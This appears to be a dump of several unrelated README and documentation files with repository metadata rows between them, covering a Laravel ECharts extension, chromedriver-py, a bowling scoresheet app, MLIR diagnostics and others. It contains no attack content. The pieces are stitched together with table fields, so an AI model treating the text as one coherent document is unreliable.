markdown을 렌더링 할 때는 별도의 플러그인을 사용한다. 예를 들면 아래의 플러그인을 사용할 수 있다.
```
npm install --save gatsby-transformer-remark
```
---
Gatsby를 가지고 노는 건 조금 나중의 일로 하고, 다음 포스트에서 gatsby-starter-bee 레포를 포크해서 Gatsby 블로그를 Netlify, AWS Amplify 등으로 배포한 경험에 대해서도 소개하겠다. | 40.130435 | 465 | 0.730769 | kor_Hang | 1.00001 |
978df1c4afa2034ddf0e15f49f6004111a01fd9e | 3,594 | md | Markdown | README.md | lihe6666/laravel-admin-echarts | b80de8ff192f9b82f5b1c59d027a54735dd299fb | [
"MIT"
] | 10 | 2020-06-02T02:45:26.000Z | 2021-09-30T03:33:53.000Z | README.md | lihe6666/laravel-admin-echarts | b80de8ff192f9b82f5b1c59d027a54735dd299fb | [
"MIT"
] | null | null | null | README.md | lihe6666/laravel-admin-echarts | b80de8ff192f9b82f5b1c59d027a54735dd299fb | [
"MIT"
] | 3 | 2020-11-29T04:25:55.000Z | 2021-05-24T11:53:59.000Z | # laravel-admin-echarts
laravel-admin的echarts统计图表扩展包
## 安装
```
$ composer require cosyphp/laravel-admin-echarts
$ php artisan vendor:publish --tag=laravel-admin-echarts
```
## 使用
- 折线图
```
public function line(Content $content)
{
return $content->header('echarts')
->row(function(Row $row){
$row->column(8, function (Column $column) {
$chartData = [
'title' => '示例折线图',
'legend' => [
'data' => ['已付款订单','未付款订单','待发货订单','已完成订单'],
'selected' => ['已付款订单' => true, '未付款订单' => false, '待发货订单' => true, '已完成订单' => true]
],
'yAxisName' => '订单量',
'xAxisData' => ['1月','2月','3月','4月','5月','6月','7月','8月','9月','10月','11月','12月'],
'seriesData' => [
[
'name' => '已付款订单',
'type' => 'line',
'stack' => '总量',
'data' => [120, 132, 101, 134, 90, 230, 210, 134, 90, 230, 210, 300]
],
[
'name' => '未付款订单',
'type' => 'line',
'stack' => '总量',
'data' => [220, 182, 191, 234, 290, 330, 310, 101, 134, 90, 230, 210]
],
[
'name' => '待发货订单',
'type' => 'line',
'stack' => '总量',
'data' => [150, 232, 201, 154, 190, 330, 410, 182, 191, 234, 290, 330]
],
[
'name' => '已完成订单',
'type' => 'line',
'stack' => '总量',
'data' => [320, 332, 301, 334, 390, 330, 320, 201, 154, 190, 330, 410]
]
]
];
$options = [
'chartId' => str_random(),
'height' => '600px',
'chartJson' => json_encode($chartData)
];
$column->row(new Box('折线图', ECharts::line($options)));
});
});
}
```
- 饼状图
```
public function pie(Content $content)
{
return $content->header('echarts')
->row(function (Row $row) {
$row->column(6, function (Column $column) {
$chartData = [
'title' => '示例饼状图',
'legends' => ["未充值人数(221105)", "总充值人数(18315)"],
'seriesName' => '总充值占比',
'seriesData' => [
[
'name' => '未充值人数',
'value' => 221105,
],
[
'name' => '总充值人数',
'value' => 18315,
]
]
];
$options = [
'chartId' => str_random(),
'height' => '500px',
'chartJson' => json_encode($chartData)
];
$column->row(new Box('饼状图', ECharts::pie($options)));
});
});
}
```
## 提示
上面使用说明中的数据,可以从数据库或者其他地方获取后进行组装整理成相应的格式,然后传参给 `ECharts` 即可。
## 联系我
在使用中有任何问题,欢迎反馈给我,可以通过以下联系方式跟我交流
* 邮箱: `[email protected]`
* QQ: `85082368`
License
------------
Licensed under [The MIT License (MIT)](LICENSE). | 34.228571 | 107 | 0.338898 | yue_Hant | 0.3147 |
978e94cb990fa56738ab7ad6722fd163dcd44043 | 1,396 | md | Markdown | README.md | brian316/chromedriver-py | 411c55579427c38f373e23bb6ebb16033535c10c | [
"Apache-2.0"
] | 19 | 2019-07-23T00:40:54.000Z | 2022-03-08T23:15:25.000Z | README.md | brian316/chromedriver-py | 411c55579427c38f373e23bb6ebb16033535c10c | [
"Apache-2.0"
] | 13 | 2019-10-11T10:28:08.000Z | 2022-02-16T11:42:30.000Z | README.md | brian316/chromedriver-py | 411c55579427c38f373e23bb6ebb16033535c10c | [
"Apache-2.0"
] | 12 | 2019-08-01T12:38:11.000Z | 2022-02-01T01:55:58.000Z | # chromedriver-py
downloads and installs the latest chromedriver binary version for automated testing of webapps.
the installer supports linux, mac and windows operating systems.
this package is maintained by an automated update script on travis.
if a new chromedriver version is out, this package will automaticly get updated within a day.
## installation
__from pypi:__
```bash
$ pip install chromedriver-py
```
__from github:__
```bash
$ pip install git+https://github.com/breuerfelix/chromedriver-py.git
```
__specific version:__
choose your version [here](https://pypi.org/project/chromedriver-py/#history)
```bash
# example for chrome version 88
pip install chromedriver-py==88.0.4324.96
```
## usage
to use chromedriver just `from chromedriver_py import binary_path`.
you will get a string variable with the executable filepath for your operating system.
## example
```python
from selenium import webdriver
from chromedriver_py import binary_path # this will get you the path variable
driver = webdriver.Chrome(executable_path=binary_path)
driver.get("http://www.python.org")
assert "Python" in driver.title
```
## developer
you can trigger a custom build with a specific version in github actions.
just click `Run workflow` and put your desired version in the `version` input field that pops up.
the workflow tries to get your desired version and push it to pypi.
| 29.083333 | 99 | 0.776504 | eng_Latn | 0.98217 |
978f269884b6ddf901a51e85902349a388a3321d | 49 | md | Markdown | _lexicon/recordOfManuscriptAlterations.md | Caroline-Vandyck/lexicon-scholarly-editing | ca1c5c717ab73595c5a7835fcc739463eaf2d2ba | [
"CC-BY-4.0"
] | null | null | null | _lexicon/recordOfManuscriptAlterations.md | Caroline-Vandyck/lexicon-scholarly-editing | ca1c5c717ab73595c5a7835fcc739463eaf2d2ba | [
"CC-BY-4.0"
] | null | null | null | _lexicon/recordOfManuscriptAlterations.md | Caroline-Vandyck/lexicon-scholarly-editing | ca1c5c717ab73595c5a7835fcc739463eaf2d2ba | [
"CC-BY-4.0"
] | null | null | null | ---
name: record of manuscript alterations
---
| 8.166667 | 38 | 0.673469 | eng_Latn | 0.990327 |
978f2e03678376c58b53b4c0cb1864bea6e197b9 | 1,299 | md | Markdown | README.md | ace-dent/term_twirl | e1c27f7e56b09b7bf5f1b9e3eb711d18ae869b88 | [
"MIT"
] | null | null | null | README.md | ace-dent/term_twirl | e1c27f7e56b09b7bf5f1b9e3eb711d18ae869b88 | [
"MIT"
] | 6 | 2020-06-29T14:46:16.000Z | 2020-06-29T23:02:10.000Z | README.md | justecorruptio/term_twirl | a9b12b700a4dc8fb66d538e9bac3f79cd49e4290 | [
"MIT"
] | null | null | null | # TERM TWIRL
This is a clone of Text Twist for Arduboy. There are over 1600 different levels.
## Controls
- Left/Right: Move the cursor.
- Up: Select a letter.
- Down: Retract a letter.
- A: Play the word.
- B: Retract all the letters. If they already are, then shuffle the letters.
## Compilation
All of the needed files are checked in to compile and upload via Arduino.
You can also tweak and rebuild the compressed dictionary with:
`. config.sh`
## Internals
We first find the most common 6-letter English words via a corpus. Based on that, look for all possible valid words
that *can* show up in a game with these 6-letter words as the target. Compress the resulting set of words into a DAWG.
Since we do not have 2^16 nodes (2^13 covers us), we have 4 wasted bits of storage every 3 bytes. (17% waste)
When loading a new level, the DAWG is traversed once to pick a random 6-letter word, and then again to find all the
words that are subanagrams of that 6-letter word.
## Sources
- Word Frequencies: Peter Norvig's [Natural Language Corpus](https://norvig.com/ngrams/)
- Word List: [Tournament Word List](https://en.wikipedia.org/wiki/NASPA_Word_List) for North American Scrabble players.
- DAWG Compressor: [DAWG generator](https://github.com/AndrasKovacs/dawg-gen) for Andras Kovacs.
| 41.903226 | 119 | 0.755966 | eng_Latn | 0.992033 |
978f91aa105379ed4764a76c620145eab4a1086a | 1,409 | md | Markdown | docs/web/how_to_make_interactive_evaluation.md | hwidjaja/ExplainaBoard | 0e670ad2df9326eb6b4ad99ba435fd7b6806557a | [
"MIT"
] | null | null | null | docs/web/how_to_make_interactive_evaluation.md | hwidjaja/ExplainaBoard | 0e670ad2df9326eb6b4ad99ba435fd7b6806557a | [
"MIT"
] | null | null | null | docs/web/how_to_make_interactive_evaluation.md | hwidjaja/ExplainaBoard | 0e670ad2df9326eb6b4ad99ba435fd7b6806557a | [
"MIT"
] | null | null | null | # How to Perform Interactive Evaluation using the ExplainaBoard Web Platform
ExplainaBoard makes it possible to perform interactive evaluation from multiple perspectives:
## Customized Bucket Number
##### Background:
ExplainaBoard achieves interpretable evaluation by bucketing evaluation performance
into different categories based on some pre-defined features.
For example, according the the text sample's length, system performance could
be grouped into 4 buckets: [2,12], [13,18], [19,24], [25,52].
If you are interested in more details, [Liu et al.2021](https://aclanthology.org/2021.acl-demo.34.pdf), [Fu et al.2020](http://aclanthology.lst.uni-saarland.de/2020.emnlp-main.489.pdf) are highly recommended.
When using ExplainaBoard Web, users can customize the number
of buckets. For example:
##### bucket number: 4
<img src="./fig/customized_bucket.png" width="300"/>
The bucket number could be updated to 5 when
* clicking `+` button
* clicking `Update analysis`
##### bucket number: 5
<img src="./fig/customized_bucket_2.png" width="300"/>
## Customized Bucket Interval
The bucket interval could also been re-specified by:
* adjusting the position of the circle in the blue line.
* clicking the `Update analysis`
For example:
`[2,12], [13,18], [19,24], [25,52]` -> `[2,12], [12,18], [18,26], [26,52]`
##### bucket number: 5
<img src="./fig/customized_bucket_3.png" width="300"/>
| 30.630435 | 208 | 0.736693 | eng_Latn | 0.941101 |
979010057250bf3400d9b198b6c99b5cd3253605 | 466 | md | Markdown | doc/wiki/mining/solo-mining.md | edmont87/ellaism | 2a73ca8d1507ddeba38a9ec1bbb921d3ff58bd29 | [
"MIT"
] | 5 | 2019-12-19T07:38:27.000Z | 2021-04-11T15:41:54.000Z | doc/wiki/mining/solo-mining.md | edmont87/ellaism | 2a73ca8d1507ddeba38a9ec1bbb921d3ff58bd29 | [
"MIT"
] | 3 | 2019-12-23T03:26:41.000Z | 2021-02-18T00:15:54.000Z | doc/wiki/mining/solo-mining.md | edmont87/ellaism | 2a73ca8d1507ddeba38a9ec1bbb921d3ff58bd29 | [
"MIT"
] | 3 | 2019-12-23T03:43:44.000Z | 2021-09-08T22:11:13.000Z | {.pagelogo}
<!-- TITLE: Solo Mining -->
<!-- SUBTITLE: Ellaism - A stable network with no premine and no dev fees -->
Follow the guide in for [Parity](/clients/parity) to either set up a full node.
After that, you can use any ethash miner (such as [ethminer](https://github.com/ethereum-mining/ethminer)) to mine Ellaism.
To mine using your GPU, run `ethminer -G -F http://localhost:8545`.
Solo Pools:
https://ella.myminers.org/
| 42.363636 | 123 | 0.7103 | eng_Latn | 0.798689 |
979165d7a00d2e023f5a5d2e142380e0f5658b68 | 5,221 | md | Markdown | README.md | andygout/bowling-challenge | 198d1159af950704944c7e75ed8bb6e310ced09e | [
"MIT"
] | 3 | 2015-07-23T14:19:02.000Z | 2015-07-23T14:31:10.000Z | README.md | andygout/bowling-challenge | 198d1159af950704944c7e75ed8bb6e310ced09e | [
"MIT"
] | null | null | null | README.md | andygout/bowling-challenge | 198d1159af950704944c7e75ed8bb6e310ced09e | [
"MIT"
] | 1 | 2018-08-14T18:35:43.000Z | 2018-08-14T18:35:43.000Z | [](https://travis-ci.org/andygout/bowling-scoresheet)
Bowling Scoresheet
=================
Brief:
-------
Count and sum the scores of a ten pin bowling game for one player as a single-page application
[The Rules of Ten Pin Bowling](https://github.com/andygout/bowling-scoresheet#the-rules-of-ten-pin-bowling)
Live demo on Heroku:
-------
[Bowling Scoresheet](https://dry-harbor-7560.herokuapp.com/)
Technologies used:
-------
- Javascript (language) with jQuery (Javascript library)
- Tested using [Jasmine](http://jasmine.github.io/) (behavior-driven development framework for testing JavaScript code)
- Deployed to Heroku [as static site using Rack gem](https://devcenter.heroku.com/articles/static-sites-ruby)
Site setup:
-------
- Run site on local server: `$ open public/index.html`
Testing setup:
-------
- Run Jasmine tests: `$ open public/SpecRunner.html`
User stories:
-------
```
As a bowler
So that I can keep track of my score during a bowling game
I want to be able to log my scores on a scoresheet
As a foolish bowler
So that I don't accidentally enter an incorrect score
I want only the remaining possible number of pins to be displayed in the selection
As an pedantic bowler
So that my strikes (X) and spares (/) are displayed in the correct form
I want those to be displayed on the scorecard rather than numbers
As a competitive bowler
So that I have an accurate score throughout
I want to see the total of a frame only once strike and spare bonuses have been added
As an addicted bowler
So that upon finishing a game I can start a new one
I want to be presented with that option
```
Learning:
-------
The logic of the strikes and spares is very complex, especially in terms of the final score for a specific frame not being available until a further one or possibly two frames are played (complicated further by the final frame). The logic had to be made as granular as possible and so I tried to atomise the larger methods into smaller, more descriptive ones, as it was very easy to fall victim to a God method with numerous if/else statements that controlled the entire game logic. Attempting the challenge again I would write separate `frame` and `final_frame` files to fully separate those sets of logic given they are so different.
I felt a substantial number of tests were necessary given the numerous variant outcomes and so I tried to cover these as comprehensively as possible.
I enjoyed playing around with jQuery and the immediate responsiveness of a single-page application (SPA) was very gratifying.
Deploying a static site to Heroku nevertheless required a server; Rack was used (installed as gem `gem 'rack'`), with `config.ru` instructing it to serve the site as static ([Heroku Dev Center: Creating Static Sites in Ruby with Rack](https://devcenter.heroku.com/articles/static-sites-ruby)).
Next steps:
-------
- UI testing with [Jasmine-jQuery](https://github.com/velesin/jasmine-jquery)
Links:
-------
[Makers Academy: Bowling Challenge brief](https://github.com/makersacademy/bowling-challenge)
[Bowling Genius (useful guide to scoring logic)](http://www.bowlinggenius.com/)
Images:
-------
#### Sign up

#### Sign up errors

The Rules of Ten Pin Bowling:
-------
A bowling game consists of 10 frames in which the player tries to knock down the 10 pins. In every frame the player can roll one or two times. The actual number depends on strikes and spares. The score of a frame is the number of knocked down pins plus bonuses for strikes and spares. After every frame the 10 pins are reset.
Strikes
-------
The player has a strike if he knocks down all 10 pins with the first roll in a frame. The frame ends immediately (since there are no pins left for a second roll). The bonus for that frame is the number of pins knocked down by the next two rolls. That would be the next frame, unless the player rolls another strike.
Spares
-------
The player has a spare if the knocks down all 10 pins with the two rolls of a frame. The bonus for that frame is the number of pins knocked down by the next roll (first roll of next frame).
10th frame
-------
If the player rolls a strike or spare in the 10th frame they can roll the additional balls for the bonus. But they can never roll more than 3 balls in the 10th frame. The additional rolls only count for the bonus not for the regular frame count.
10, 10, 10 in the 10th frame gives 30 points (10 points for the regular first strike and 20 points for the bonus).
1, 9, 10 in the 10th frame gives 20 points (10 points for the regular spare and 10 points for the bonus).
Gutter Game
-------
A Gutter Game is when the player never hits a pin (20 zero scores).
Perfect Game
-------
A Perfect Game is when the player rolls 12 strikes (10 regular strikes and 2 strikes for the bonus in the 10th frame). The Perfect Game scores 300 points.
In the image below you can find some score examples.
More about ten pin bowling here: http://en.wikipedia.org/wiki/Ten-pin_bowling

| 35.760274 | 635 | 0.752921 | eng_Latn | 0.99795 |
9791b777fece38ac064669dc3ba5331d999098c6 | 305 | md | Markdown | _sections/education.md | AliBharwani/alibharwani.github.io | cf6b1e81d2fbc8649be1f7d8c4fa84e6dcd43a75 | [
"CC-BY-3.0"
] | null | null | null | _sections/education.md | AliBharwani/alibharwani.github.io | cf6b1e81d2fbc8649be1f7d8c4fa84e6dcd43a75 | [
"CC-BY-3.0"
] | null | null | null | _sections/education.md | AliBharwani/alibharwani.github.io | cf6b1e81d2fbc8649be1f7d8c4fa84e6dcd43a75 | [
"CC-BY-3.0"
] | null | null | null | ---
title: Education
icon: fa-graduation-cap
order: 3
---
<img src="{{ 'assets/images/GaTech-Seal.png' | relative_url }}" width="200" alt="GaTech Seal" />
## Georgia Institute of Technology
### **GPA: 4.0 / 4.0**
Bachelors in Computer Science, Threads: Intelligence & Info Networks
Expected May 2020
| 20.333333 | 96 | 0.688525 | eng_Latn | 0.334317 |
97922ab3b9175a95f97d44bdb9ab6f7c4390e1cc | 2,660 | md | Markdown | _posts/OS/A/2015-01-20-OsABCI8~TSC1.md | tiantian-chen/tiantian-chen.github.io | 1b85da907278ea16f08ea41926cd423268340d00 | [
"MIT"
] | null | null | null | _posts/OS/A/2015-01-20-OsABCI8~TSC1.md | tiantian-chen/tiantian-chen.github.io | 1b85da907278ea16f08ea41926cd423268340d00 | [
"MIT"
] | null | null | null | _posts/OS/A/2015-01-20-OsABCI8~TSC1.md | tiantian-chen/tiantian-chen.github.io | 1b85da907278ea16f08ea41926cd423268340d00 | [
"MIT"
] | null | null | null | ---
layout: post
title: "OsABCI8,TSC1"
description: ""
category: genes
tags: [chloroplast, development, homeostasis, transporter, iron, chloroplast development, ABC transporter, leaf, seedlings, leaf development, copper]
---
* **Information**
+ Symbol: OsABCI8,TSC1
+ MSU: [LOC_Os11g29850](http://rice.plantbiology.msu.edu/cgi-bin/ORF_infopage.cgi?orf=LOC_Os11g29850)
+ RAPdb: [Os11g0490800](http://rapdb.dna.affrc.go.jp/viewer/gbrowse_details/irgsp1?name=Os11g0490800)
* **Publication**
+ [A naturally occurring conditional albino mutant in rice caused by defects in the plastid-localized OsABCI8 transporter.](http://www.ncbi.nlm.nih.gov/pubmed?term=A naturally occurring conditional albino mutant in rice caused by defects in the plastid-localized OsABCI8 transporter.%5BTitle%5D), 2017, Plant Mol Biol.
+ [TSC1 enables plastid development under dark conditions, contributing to rice adaptation to transplantation shock.](http://www.ncbi.nlm.nih.gov/pubmed?term=TSC1 enables plastid development under dark conditions, contributing to rice adaptation to transplantation shock.%5BTitle%5D), 2017, J Integr Plant Biol.
* **Genbank accession number**
* **Key message**
+ Subcellular localization demonstrated that OsABCI8 is a chloroplast ABC transporter
+ Besides defects in chloroplast development and chlorophyll biosynthesis, the mutant phenotype is accompanied by a higher accumulation of iron, suggesting that OsABCI8 is involved in iron transportation and/or homeostasis in rice
+ Our results demonstrate that OsABCI8 represents a conserved ABCI protein involved in transition metals transportation and/or homeostasis and suggest an important role of the plastid-localized OsABCI8 for chloroplast development
+ Blocking light from reaching the juvenile leaves and leaf primordia caused chloroplast deficiencies in transplanted tsc1 seedlings
+ TSC1 was upregulated following transplantation, and modulated the iron and copper levels, thereby regulating prolamellar body formation during the early P4 stage of leaf development
+ TSC1 enables plastid development under dark conditions, contributing to rice adaptation to transplantation shock.
+ We found that TSC1 controls plastid development in rice under dark conditions, and functions independently of light signaling
+ Therefore, TSC1 is indispensable for plastid development in the absence of light, and contributes to adaptation to transplantation shock
+ TSC1 encodes a noncanonical ATP-binding cassette (ABC) transporter homologous to AtNAP14 and of cyanobacterial origin
* **Connection**
[//]: # * **Key figures**
| 73.888889 | 322 | 0.787594 | eng_Latn | 0.962206 |
97922f98fed33704cad5af1166528a58bd3cf904 | 1,412 | md | Markdown | README.md | AureliiiieP/Camping-availabilities-notification-bot | 59f8eae7856bd78647908ce6be49ea182a9db0ed | [
"MIT"
] | 2 | 2022-03-11T08:46:20.000Z | 2022-03-11T08:47:23.000Z | README.md | AureliiiieP/Camping-availabilities-notification-bot | 59f8eae7856bd78647908ce6be49ea182a9db0ed | [
"MIT"
] | null | null | null | README.md | AureliiiieP/Camping-availabilities-notification-bot | 59f8eae7856bd78647908ce6be49ea182a9db0ed | [
"MIT"
] | null | null | null | # Camping-availabilities-notification-bot
Small bot that sends a notification to a Telegram bot when there are some availabilities (for specific day like Saturday ... and specific accomodation type) in a super super popular camping place in Japan that is always full minutes after reservations are open.
If there are no availability for chosen accomodation plan and day of the week, no message is sent.

Disclaimer : This was made for study purposes. I have completely given up trying to get a reservation at this place. Please don't do anything bad with this kind of technology (scalping etc ...)
Pictures are from the official website of the camping place !
## How to run
You can run by using
```
python3 monitoring_bot.py
```
## How to set up Telegram bot
Please follow these [instructions](https://sendpulse.com/knowledge-base/chatbot/create-telegram-chatbot) !
Then, please input your url in the config file as
```
telegram_bot_url = "https://api.telegram.org/<token>/sendMessage"
```
## Automatically run this bot periodically
You can use cron to run this script at your chosen frequency. For example
```
crontab -e
```
Then add the schedule expression. Please see this [site](https://crontab.guru/examples.html) for examples.
For example every day at 3PM would be
```
0 15 * * * /path/to/monitoring_bot.py
```
Note. Please don't use this to do scalping !
| 37.157895 | 261 | 0.759915 | eng_Latn | 0.997659 |
97927a3aff03b4c21a88cd053e962d8b59c33eba | 10,543 | md | Markdown | g3doc/Diagnostics.md | hephaex/mlir | 39608a04cb5daa598a0403218a0c67be24cfda4c | [
"Apache-2.0"
] | 1 | 2019-09-11T11:20:36.000Z | 2019-09-11T11:20:36.000Z | g3doc/Diagnostics.md | hephaex/mlir | 39608a04cb5daa598a0403218a0c67be24cfda4c | [
"Apache-2.0"
] | null | null | null | g3doc/Diagnostics.md | hephaex/mlir | 39608a04cb5daa598a0403218a0c67be24cfda4c | [
"Apache-2.0"
] | 1 | 2019-09-11T11:20:25.000Z | 2019-09-11T11:20:25.000Z | # Introduction and Usage Guide to MLIR's Diagnostics Infrastructure
[TOC]
This document presents an introduction to using and interfacing with MLIR's
diagnostics infrastructure.
See [MLIR specification](LangRef.md) for more information about MLIR, the
structure of the IR, operations, etc.
## Source Locations
Source location information is extremely important for any compiler, because it
provides a baseline for debuggability and error-reporting. MLIR provides several
different location types depending on the situational need.
### CallSite Location
``` {.ebnf}
callsite-location ::= 'callsite' '(' location 'at' location ')'
```
An instance of this location allows for representing a directed stack of
location usages. This connects a location of a `callee` with the location of a
`caller`.
### FileLineCol Location
``` {.ebnf}
filelinecol-location ::= string-literal ':' integer-literal ':' integer-literal
```
An instance of this location represents a tuple of file, line number, and column
number. This is similar to the type of location that you get from most source
languages.
### Fused Location
``` {.ebnf}
fused-location ::= `fused` fusion-metadata? '[' location (location ',')* ']'
fusion-metadata ::= '<' attribute-value '>'
```
An instance of a `fused` location represents a grouping of several other source
locations, with optional metadata that describes the context of the fusion.
There are many places within a compiler in which several constructs may be fused
together, e.g. pattern rewriting, that normally result partial or even total
loss of location information. With `fused` locations, this is a non-issue.
### Name Location
``` {.ebnf}
name-location ::= string-literal ('(' location ')')?
```
An instance of this location allows for attaching a name to a child location.
This can be useful for representing the locations of variable, or node,
definitions.
### Unknown Location
``` {.ebnf}
unknown-location ::= `unknown`
```
Source location information is an extremely integral part of the MLIR
infrastructure. As such, location information is always present in the IR, and
must explicitly be set to unknown. Thus an instance of the `unknown` location,
represents an unspecified source location.
## Diagnostic Engine
The `DiagnosticEngine` acts as the main interface for diagnostics in MLIR. It
manages the registration of diagnostic handlers, as well as the core API for
diagnostic emission. It can be interfaced with via an `MLIRContext` instance.
```c++
DiagnosticEngine engine = ctx->getDiagEngine();
engine.setHandler([](Diagnostic diag) {
// Handle the reported diagnostic.
});
```
### Constructing a Diagnostic
As stated above, the `DiagnosticEngine` holds the core API for diagnostic
emission. A new diagnostic can be emitted with the engine via `emit`. This
method returns an [InFlightDiagnostic](#inflight-diagnostic) that can be
modified further.
```c++
InFlightDiagnostic emit(Location loc, DiagnosticSeverity severity);
```
Using the `DiagnosticEngine`, though, is generally not the preferred way to emit
diagnostics in MLIR. [`operation`](LangRef.md#operations) provides utility
methods for emitting diagnostics:
```c++
// `emit` methods available in the mlir namespace.
InFlightDiagnostic emitError/Remark/Warning(Location);
// These methods use the location attached to the operation.
InFlightDiagnostic Operation::emitError/Remark/Warning();
// This method creates a diagnostic prefixed with "'op-name' op ".
InFlightDiagnostic Operation::emitOpError();
```
## Diagnostic
A `Diagnostic` in MLIR contains all of the necessary information for reporting a
message to the user. A `Diagnostic` essentially boils down to three main
components:
* [Source Location](#source-locations)
* Severity Level
- Error, Note, Remark, Warning
* Diagnostic Arguments
- The diagnostic arguments are used when constructing the output message.
### Appending arguments
One a diagnostic has been constructed, the user can start composing it. The
output message of a diagnostic is composed of a set of diagnostic arguments that
have been attached to it. New arguments can be attached to a diagnostic in a few
different ways:
```c++
// A few interesting things to use when composing a diagnostic.
Attribute fooAttr;
Type fooType;
SmallVector<int> fooInts;
// Diagnostics can be composed via the streaming operators.
op->emitError() << "Compose an interesting error: " << fooAttr << ", " << fooType
<< ", (" << fooInts << ')';
// This could generate something like (FuncAttr:@foo, IntegerType:i32, {0,1,2}):
"Compose an interesting error: @foo, i32, (0, 1, 2)"
```
### Attaching notes
Unlike many other compiler frameworks, notes in MLIR cannot be emitted directly.
They must be explicitly attached to another diagnostic non-note diagnostic. When
emitting a diagnostic, notes can be directly attached via `attachNote`. When
attaching a note, if the user does not provide an explicit source location the
note will inherit the location of the parent diagnostic.
```c++
// Emit a note with an explicit source location.
op->emitError("...").attachNote(noteLoc) << "...";
// Emit a note that inherits the parent location.
op->emitError("...").attachNote() << "...";
```
## InFlight Diagnostic
Now that [Diagnostics](#diagnostic) have been explained, we introduce the
`InFlightDiagnostic`. is an RAII wrapper around a diagnostic that is set to be
reported. This allows for modifying a diagnostic while it is still in flight. If
it is not reported directly by the user it will automatically report when
destroyed.
```c++
{
InFlightDiagnostic diag = op->emitError() << "...";
} // The diagnostic is automatically reported here.
```
## Common Diagnostic Handlers
To interface with the diagnostics infrastructure, users will need to register a
diagnostic handler with the [`DiagnosticEngine`](#diagnostic-engine).
Recognizing the many users will want the same handler functionality, MLIR
provides several common diagnostic handlers for immediate use.
### Scoped Diagnostic Handler
This diagnostic handler is a simple RAII class that saves and restores the
current diagnostic handler registered to a given context. This class can be
either be used directly, or in conjunction with a derived diagnostic handler.
```c++
// Construct the handler directly.
MLIRContext context;
ScopedDiagnosticHandler scopedHandler(&context, [](Diagnostic diag) {
...
});
// Use this handler in conjunction with another.
class MyDerivedHandler : public ScopedDiagnosticHandler {
MyDerivedHandler(MLIRContext *ctx) : ScopedDiagnosticHandler(ctx) {
ctx->getDiagEngine().setHandler([&](Diagnostic diag) {
...
});
}
};
```
### SourceMgr Diagnostic Handler
This diagnostic handler is a wrapper around an llvm::SourceMgr instance. It
provides support for displaying diagnostic messages inline with a line of a
respective source file. This handler will also automatically load newly seen
source files into the SourceMgr when attempting to display the source line of a
diagnostic. Example usage of this handler can be seen in the `mlir-opt` tool.
```shell
$ mlir-opt foo.mlir
/tmp/test.mlir:6:24: error: expected non-function type
func @foo() -> (index, ind) {
^
```
To use this handler in your tool, add the following:
```c++
SourceMgr sourceMgr;
MLIRContext context;
SourceMgrDiagnosticHandler sourceMgrHandler(sourceMgr, &context);
```
### SourceMgr Diagnostic Verifier Handler
This handler is a wrapper around a llvm::SourceMgr that is used to verify that
certain diagnostics have been emitted to the context. To use this handler,
annotate your source file with expected diagnostics in the form of:
* `expected-(error|note|remark|warning) {{ message }}`
A few examples are shown below:
```mlir {.mlir}
// Expect an error on the same line.
func @bad_branch() {
br ^missing // expected-error {{reference to an undefined block}}
}
// Expect an error on an adjacent line.
func @foo(%a : f32) {
// expected-error@+1 {{unknown comparison predicate "foo"}}
%result = cmpf "foo", %a, %a : f32
return
}
```
The handler will report an error if any unexpected diagnostics were seen, or if
any expected diagnostics weren't.
```shell
$ mlir-opt foo.mlir
/tmp/test.mlir:6:24: error: unexpected error: expected non-function type
func @foo() -> (index, ind) {
^
/tmp/test.mlir:15:4: error: expected remark "expected some remark" was not produced
// expected-remark {{expected some remark}}
^~~~~~~~~~~~~~~~~~~~~~~~~~
```
Similarly to the [SourceMgr Diagnostic Handler](#sourcemgr-diagnostic-handler),
this handler can be added to any tool via the following:
```c++
SourceMgr sourceMgr;
MLIRContext context;
SourceMgrDiagnosticVerifierHandler sourceMgrHandler(sourceMgr, &context);
```
### Parallel Diagnostic Handler
MLIR is designed from the ground up to be multi-threaded. One important to thing
to keep in mind when multi-threading is determinism. This means that the
behavior seen when operating on multiple threads is the same as when operating
on a single thread. For diagnostics, this means that the ordering of the
diagnostics is the same regardless of the amount of threads being operated on.
The ParallelDiagnosticHandler is introduced to solve this problem.
After creating a handler of this type, the only remaining step is to ensure that
each thread that will be emitting diagnostics to the handler sets a respective
'orderID'. The orderID corresponds to the order in which diagnostics would be
emitted when executing synchronously. For example, if we were processing a list
of operations [a, b, c] on a single-thread. Diagnostics emitted while processing
operation 'a' would be emitted before those for 'b' or 'c'. This corresponds 1-1
with the 'orderID'. The thread that is processing 'a' should set the orderID to
'0'; the thread processing 'b' should set it to '1'; and so on and so forth.
This provides a way for the handler to deterministically order the diagnostics
that it receives given the thread that it is receiving on.
A simple example is shown below:
```c++
MLIRContext *context = ...;
ParallelDiagnosticHandler handler(context);
// Process a list of operations in parallel.
std::vector<Operation *> opsToProcess = ...;
llvm::for_each_n(llvm::parallel::par, 0, opsToProcess.size(),
[&](size_t i) {
// Notify the handler that we are processing the i'th operation.
handler.setOrderIDForThread(i);
auto *op = opsToProcess[i];
...
});
```
| 33.900322 | 83 | 0.749312 | eng_Latn | 0.9933 |
979287ed701b0bd9751775167028c04b57e8c5af | 325 | md | Markdown | site/content/aks__devinfra__base-os-runtime-static.md | sajayantony/mcr-images | 9ecf2b4f6873cc33da68f1c608c7bb3a175ca5d3 | [
"MIT"
] | null | null | null | site/content/aks__devinfra__base-os-runtime-static.md | sajayantony/mcr-images | 9ecf2b4f6873cc33da68f1c608c7bb3a175ca5d3 | [
"MIT"
] | null | null | null | site/content/aks__devinfra__base-os-runtime-static.md | sajayantony/mcr-images | 9ecf2b4f6873cc33da68f1c608c7bb3a175ca5d3 | [
"MIT"
] | null | null | null | ---
title: aks/devinfra/base-os-runtime-static
---
- distroless.210705.3
- master.210622.2
- master.210627.2
- master.210705.1
- master.210705.2
- master.210708.2
- master.210712.1
- master.210716.1
- master.210717.1
- master.210717.2
- master.210719.1
- master.210802.2
- master.210802.3
- master.210903.1
- master.210906.1
| 17.105263 | 42 | 0.72 | yue_Hant | 0.043993 |
9792986971c534b17f42161c0f6b2141c034b8c7 | 17 | md | Markdown | README.md | A1-Sekcja-Naukowa/www | 27c1624ab3d4d592d31e339e4954064b0c0f9ee3 | [
"MIT"
] | null | null | null | README.md | A1-Sekcja-Naukowa/www | 27c1624ab3d4d592d31e339e4954064b0c0f9ee3 | [
"MIT"
] | null | null | null | README.md | A1-Sekcja-Naukowa/www | 27c1624ab3d4d592d31e339e4954064b0c0f9ee3 | [
"MIT"
] | null | null | null | # Strona www A1
| 5.666667 | 15 | 0.647059 | pol_Latn | 0.559679 |
